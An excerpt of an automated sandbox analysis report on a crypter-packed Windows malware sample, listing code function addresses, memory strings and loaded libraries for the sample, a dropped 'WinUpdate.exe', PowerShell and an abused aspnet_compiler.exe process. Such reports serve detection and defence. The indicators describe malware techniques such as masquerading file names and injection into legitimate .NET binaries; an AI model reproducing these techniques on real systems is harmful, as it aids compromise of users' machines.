                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 9_2_05C80FE09_2_05C80FE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 9_2_05C85F009_2_05C85F00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 9_2_05C807109_2_05C80710
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 9_2_05C83E809_2_05C83E80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 9_2_05C859089_2_05C85908
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 9_2_05C828F09_2_05C828F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 9_2_05C82D519_2_05C82D51
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 9_2_05C8ECE09_2_05C8ECE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 9_2_05C83E809_2_05C83E80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 9_2_05C83E709_2_05C83E70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 9_2_05C828E09_2_05C828E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 9_2_05C803C89_2_05C803C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 9_2_05C82A809_2_05C82A80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 9_2_05C83A209_2_05C83A20
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeCode function: 14_2_031971C014_2_031971C0
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeCode function: 14_2_0319AC6814_2_0319AC68
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeCode function: 14_2_031987D814_2_031987D8
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeCode function: 14_2_031974F714_2_031974F7
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeCode function: 14_2_0322D31814_2_0322D318
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeCode function: 14_2_0322C50814_2_0322C508
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeCode function: 14_2_0322B47914_2_0322B479
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeCode function: 14_2_03222BB714_2_03222BB7
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeCode function: 14_2_0322D3D914_2_0322D3D9
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeCode function: 14_2_0322815014_2_03228150
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeCode function: 14_2_0322C8FE14_2_0322C8FE
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeCode function: 14_2_0322D7C014_2_0322D7C0
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeCode function: 14_2_0322C54214_2_0322C542
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeCode function: 14_2_0322C4F814_2_0322C4F8
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeCode function: 14_2_0322B47914_2_0322B479
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeCode function: 14_2_06E7735814_2_06E77358
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeCode function: 19_2_00BFD31819_2_00BFD318
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeCode function: 19_2_00BFB47919_2_00BFB479
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeCode function: 19_2_00BFC50819_2_00BFC508
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeCode function: 19_2_00BF36F819_2_00BF36F8
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeCode function: 19_2_00BFC8FE19_2_00BFC8FE
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeCode function: 19_2_00BF815019_2_00BF8150
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeCode function: 19_2_00BF2BB719_2_00BF2BB7
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeCode function: 19_2_00BFD3D919_2_00BFD3D9
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeCode function: 19_2_00BFC4A719_2_00BFC4A7
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeCode function: 19_2_00BFC4F819_2_00BFC4F8
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeCode function: 19_2_00BFB47919_2_00BFB479
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeCode function: 19_2_00BFCCD319_2_00BFCCD3
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeCode function: 19_2_00BFCDCE19_2_00BFCDCE
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeCode function: 19_2_00BFC54219_2_00BFC542
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeCode function: 19_2_00BFD7C019_2_00BFD7C0
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeCode function: 19_2_047271C019_2_047271C0
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeCode function: 19_2_047274F719_2_047274F7
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeCode function: 19_2_047287D819_2_047287D8
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeCode function: 19_2_0629735819_2_06297358
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeCode function: 19_2_0629B7F019_2_0629B7F0
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeCode function: 19_2_0629B7E219_2_0629B7E2
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeCode function: 26_2_06797C3426_2_06797C34
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeCode function: 26_2_06797DF426_2_06797DF4
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeCode function: 26_2_0175B08826_2_0175B088
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeCode function: 26_2_0175C33826_2_0175C338
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeCode function: 26_2_0175DFA826_2_0175DFA8
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeCode function: 26_2_018D295826_2_018D2958
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeCode function: 26_2_05B7B57826_2_05B7B578
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeCode function: 26_2_05B7B56726_2_05B7B567
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeCode function: 26_2_069AA77826_2_069AA778
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeCode function: 26_2_069A8B8026_2_069A8B80
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeCode function: 26_2_081B01A126_2_081B01A1
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeCode function: 26_2_081BF51026_2_081BF510
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeCode function: 26_2_081B3E5826_2_081B3E58
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeCode function: 26_2_081B211826_2_081B2118
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeCode function: 26_2_0B670B4026_2_0B670B40
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeCode function: 26_2_0B670C0026_2_0B670C00
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeCode function: 26_2_0B6C7BF426_2_0B6C7BF4
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeCode function: 26_2_0B6C7BC426_2_0B6C7BC4
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeCode function: 26_2_0B6CAAB826_2_0B6CAAB8
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeCode function: 26_2_0B6C91B026_2_0B6C91B0
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeCode function: 26_2_0B6C641026_2_0B6C6410
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeCode function: 26_2_0B6CAAA926_2_0B6CAAA9
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeCode function: 26_2_0BCA6CB826_2_0BCA6CB8
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeCode function: 26_2_0BCA798826_2_0BCA7988
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeCode function: 26_2_0BCA7EE026_2_0BCA7EE0
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeCode function: 26_2_0BD0263026_2_0BD02630
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeCode function: 26_2_0BD075D026_2_0BD075D0
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeCode function: 26_2_0BD0262026_2_0BD02620
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeCode function: 26_2_0BD0C5C026_2_0BD0C5C0
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeCode function: 26_2_0BD075C126_2_0BD075C1
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeCode function: 26_2_0BD0C5BF26_2_0BD0C5BF
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeCode function: 26_2_0C03550426_2_0C035504
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeCode function: 26_2_0C03D54026_2_0C03D540
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeCode function: 26_2_018D004026_2_018D0040
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeCode function: 26_2_067972B626_2_067972B6
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeCode function: String function: 0040A008 appears 91 times
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeCode function: String function: 004299B0 appears 52 times
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeCode function: String function: 00429950 appears 51 times
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeCode function: String function: 00410143 appears 51 times
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeCode function: String function: 00429A30 appears 48 times
                  Source: SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe, 00000000.00000002.2053102955.0000000002A70000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe
                  Source: SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe, 00000000.00000002.2053224069.00000000030AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXClientPlayit.exe4 vs SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe
                  Source: SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe, 00000000.00000002.2052722664.0000000000E7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe
                  Source: SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe, 00000000.00000002.2053224069.0000000002C71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameObpdoxohp.dll" vs SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeSection loaded: msimg32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeSection loaded: devrtl.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeSection loaded: riched20.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeSection loaded: usp10.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeSection loaded: msls31.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeSection loaded: explorerframe.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeSection loaded: linkinfo.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeSection loaded: ntshrui.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeSection loaded: cscapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: linkinfo.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: ntshrui.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: cscapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: rasadhlp.dllJump to behavior
